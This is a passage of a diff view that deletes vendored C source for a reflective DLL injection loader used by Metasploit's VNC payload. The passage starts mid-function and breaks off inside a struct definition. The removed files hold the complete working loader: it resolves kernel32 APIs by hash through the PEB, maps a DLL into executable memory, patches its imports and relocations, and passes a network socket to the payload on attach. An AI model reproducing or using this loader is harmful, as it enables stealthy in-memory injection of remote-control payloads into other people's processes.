return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwMeterpreterArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
//===============================================================================================//

37
external/source/vncdll/loader/LoadLibraryR.h vendored
View File

@ -1,37 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H
#define _VNCDLL_LOADER_LOADLIBRARYR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
//===============================================================================================//
#endif
//===============================================================================================//

53
external/source/vncdll/loader/ReflectiveDLLInjection.h vendored
View File

@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

451
external/source/vncdll/loader/ReflectiveLoader.c vendored
View File

@ -1,451 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

197
external/source/vncdll/loader/ReflectiveLoader.h vendored
View File

@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
